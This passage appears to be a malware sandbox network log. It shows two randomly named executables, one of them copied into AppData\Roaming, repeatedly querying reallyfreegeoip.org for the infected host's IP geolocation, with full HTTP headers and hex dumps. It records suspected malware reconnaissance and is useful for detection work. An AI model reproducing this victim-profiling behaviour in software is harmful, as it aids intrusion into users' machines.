                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1708&rtt_var=648&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1709601&cwnd=248&unsent_bytes=0&cid=4c50adf03cdbfb33&ts=464&x=0"
                                                                                                                          2024-12-05 17:51:19 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.749724104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:21 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:21 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298504
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zCgHjhmEg8U0dnTKaWLS90vlnY3x5QbyL6qHPnwu%2FiIkTwDj3OmeOUy%2F0B0RFsQzsnfDMUzkbeO4IJrtWCffGslUtQrvqkEbdpJKvfSpPM93fCNuPlhtTTs6nHh6mU3R%2FHTS29Hs"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e23ecd27423e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1700&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1603514&cwnd=191&unsent_bytes=0&cid=cb009ea1e5817756&ts=467&x=0"
                                                                                                                          2024-12-05 17:51:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.749730104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:21 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:21 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:21 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298504
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYHlgWounLv%2FK1CVQbkrKMEuNAcvjnE5W91E7vL3xCFGRYK7tjkXXdPQwIm7%2F780yjpqbK7LgEjmH6OUAupC%2BMpfuUJlndLg4nQjHkerH7CJjEScmOyu4wFy4zYh1YxpHBwZVew9"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e23eda844229-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1720&rtt_var=655&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1656267&cwnd=236&unsent_bytes=0&cid=777fa365d1134654&ts=481&x=0"
                                                                                                                          2024-12-05 17:51:21 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.749742104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:24 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:24 UTC878INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:24 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298507
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEEwSJ9Dy69ZL%2FViyRyBxtLvaeVHjoengLBFMK39mTLLn4nGoJ7WdWTwxoQ5XPUe32fV9MflQDRyO3ANOD%2F0FqLQJWaMTPeENSY8GGkeVns%2B1%2B3zoDPcFajeAz3yamJPSnHKur2o"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e25309c34228-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1672&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1687861&cwnd=205&unsent_bytes=0&cid=7fb4ca5e15a8216c&ts=479&x=0"
                                                                                                                          2024-12-05 17:51:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.749741104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:24 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:24 UTC882INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:24 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298507
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdwQtEfujYW6%2Bu45PHze4V9OJr0svHNVUM9CD%2FGe7kQq3qa%2FkzhUwb4bNunmfr0csY1D2x1ztyUF7fjhyEHFyc43rcRT6%2FrIYJV%2BCra0zROpXQLWkauZZKOpWjTdRYb%2FBfXGKEFe"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e2530d0141a6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1697&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1695702&cwnd=239&unsent_bytes=0&cid=0fa62ff52c9634ed&ts=490&x=0"
                                                                                                                          2024-12-05 17:51:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.749753104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:27 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:28 UTC877INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298510
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1syXl8DvtjSfUYxs1AgSD15acsiKMZrqAEYJmZislN97C578nnKM6Ff0TEIYASUni42Ij2pG1HHRCl23ThIChzHjheSk9C%2FsdLu8n3kfA0OEt%2FNjDc8N7Pgu%2Fu%2BGMnFd7INXZT4"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e267de9ac436-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1702&rtt_var=851&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4240&recv_bytes=699&delivery_rate=104636&cwnd=220&unsent_bytes=0&cid=a546439c0da678cd&ts=485&x=0"
                                                                                                                          2024-12-05 17:51:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.749752104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:27 UTC61OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2024-12-05 17:51:28 UTC887INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:27 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298510
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRChQf%2FQZeS1WkFIz86tOY%2F1PASBPh3awxZAi%2Bkf35PkEEXWtxor%2BDMAFVu%2F%2FoVnN5EFTkvwe5tpI2lQhLTIRP00iW%2Bm4WNmh3tWy7gHiCfgagy14B2RyrXv4eEtZ59%2FIrQ%2BeDy"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e267cc6418d0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=111395&cwnd=184&unsent_bytes=0&cid=c9c5afe9d6aaa7a2&ts=496&x=0"
                                                                                                                          2024-12-05 17:51:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.749765104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:30 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:31 UTC870INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:31 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298514
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpJMno3Lm2oNQY0JyGvR8ZBnzLjRdaScnbiRUU94NaguCJ1Vc2Uv14eCOAUO8Nfrmnv4GbjUXr5YAfQCg64JvmmMjATFC5mxKN5W6jogeLV3FHvR9BPiPvkzGwmkmxBrT2MwC20n"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e27c4ffb8c47-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1990&rtt_var=766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1409266&cwnd=230&unsent_bytes=0&cid=6505892a68d6924d&ts=480&x=0"
                                                                                                                          2024-12-05 17:51:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.749766104.21.67.1524437728C:\Users\user\AppData\Roaming\aoTiGLRa.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:31 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:31 UTC878INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:31 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298514
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxpegQKO3UYUIOdkVoPiQYdV%2BegXNCvuPemRx6Q%2B0KPAaoplDYscB2ze4PiGAXoHyuDfzBThRbjEKeTlglTbTbBtn3JsPq5FBvrS%2BDQ5Pq2OaxpKck1mapkh%2F0NUJQnvVR44IVOV"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ed5e27cfaaf43df-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1603&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=243&unsent_bytes=0&cid=dbfc6e0641b07b8f&ts=463&x=0"
                                                                                                                          2024-12-05 17:51:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.228</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.749775104.21.67.1524437308C:\Users\user\Desktop\Ti5nuRV7y4.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-05 17:51:34 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-12-05 17:51:34 UTC876INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 05 Dec 2024 17:51:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Age: 298517
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
                                                                                                                          Accept-Ranges: bytes
